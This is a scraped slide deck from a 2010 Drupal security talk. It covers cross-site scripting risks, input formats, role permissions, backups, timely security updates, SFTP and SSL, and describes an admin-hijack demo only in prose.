This document discusses Drupal security best practices. It introduces the presenters and defines common security threats like cross-site scripting. It demonstrates how malicious javascript could hijack an admin account. Charts show the most common vulnerabilities and input formats are discussed as a way to control user input. The document stresses keeping software updated, using backups, and following secure development practices.
2024: Domino Containers - The Next Step. News from the Domino Container commu...
Drupal security - Configuration and process
1. Drupal Security
Gábor Hojtsy & Ben Jeavons
24. aug 14:45
VPS.net
Tuesday, August 31, 2010
2. Who we are
• Gábor Hojtsy • Ben Jeavons
• Drupal 6 co-maintainer • Drupal Security Report
• Acquia • Growing Venture Solutions
• Security Team Member • Security Team Member
Tuesday, August 31, 2010
3. Web security
• Protecting resources from abuse
• Protecting data
• Protecting available actions
• Attackers exploit a weakness to do harm
Tuesday, August 31, 2010
4. Demo
• Malicious Javascript is entered
• Admin unknowingly executes
• Javascript alters admin-only settings
• Changes admin password
• Puts site offline
Tuesday, August 31, 2010
5. 66%
likeliness a website has
Cross Site Scripting
http://whitehatsec.com/home/assets/presentations/09PPT/PPT_statsfall09_8th.pdf
Tuesday, August 31, 2010
7. Lots of risks
• Prioritize your actions
• Secure configuration
• Careful processes
• Keep code up-to-date
• Audit custom code
Tuesday, August 31, 2010
8. Smart configuration
• Control user input
• Input formats
• Trust
• Roles and permissions
Tuesday, August 31, 2010
9. Input formats
• Input formats control what happens when
user-supplied data is displayed
Tuesday, August 31, 2010
10. Input formats
• Filtered HTML for untrusted roles
• Full HTML for completely trusted roles
Tuesday, August 31, 2010
11. Filtered HTML
• HTML filter
• Limits the allowed tags
Tuesday, August 31, 2010
12. Unsafe HTML tags
• Script tags or any that allow JS events
• <script>
• Any that allow URL reference
• <img>
Tuesday, August 31, 2010
13. No image tags?!
• Image tags allow for CSRF attacks
• It’s a matter of trust
• Use CCK & imagefield
• Use control access to Full HTML
Tuesday, August 31, 2010
14. Trust
• Know your roles
• Which users have which roles
• How roles are granted
Tuesday, August 31, 2010
15. “Super-admin”
permissions
• Administer permissions
• Administer users
• Administer filters
• Administer content types
• Administer site configuration
Tuesday, August 31, 2010
16. Trust
• Utilize principle of Least Privilege
• Grant only the necessary permissions to
carry out the required work
Tuesday, August 31, 2010
18. Recovering from attack
• Restore from backup
• Upgrade to latest security releases
• Change your passwords
• Audit your configuration & custom code
Tuesday, August 31, 2010
19. Backups
• You do have backups, don’t you?
• phpMyAdmin > Export
• mysqldump on the command line
• Be sure to check they worked!
Tuesday, August 31, 2010
20. Open source is secure
• Source code is open for people to look at
• Popularity means eyes on code
• Collaboration increases code quality
Tuesday, August 31, 2010
21. Drupal is secure
• Drupal APIs are designed to be secure
• http://drupal.org/writing-secure-code
Tuesday, August 31, 2010
22. Drupal security team
• Team of volunteers
• Support core and all(!) of contrib
• Not actively reviewing all contrib projects
Tuesday, August 31, 2010
23. Security Advisories
• Only stable project releases
• SAs on Wednesdays
• New core release types
• Bug fix release / Security fix release
Tuesday, August 31, 2010
24. Stay up-to-date
• Know about security updates
• Security Advisories
• Update status module
• Mailing list, RSS, Twitter
• Apply them!
Tuesday, August 31, 2010
25. Security updates
• Most security updates are small
• But not always
• Apply updates to development instance
• Test, then apply to production
Tuesday, August 31, 2010
26. FTP
• Do not use it!
• Common vector for attack
• Really, we’ve moved past plain-text
Tuesday, August 31, 2010
27. SFTP
• “Secure” FTP
• Your host should provide it
• If not, consider a new one
Tuesday, August 31, 2010
28. SSL
• Run Drupal on full SSL
• Use securepages and
securepages_prevent_hijack modules
• http://crackingdrupal.com/blog/greggles/
drupal-and-ssl-multiple-recipes-possible-
solutions-https
• Use a valid certificate
Tuesday, August 31, 2010
29. Security Review
• http://drupal.org/project/security_review
• File system permissions
• Granted “super-admin” permissions
• Input formats
• Allowed upload extensions
• PHP & Javascript in content
Tuesday, August 31, 2010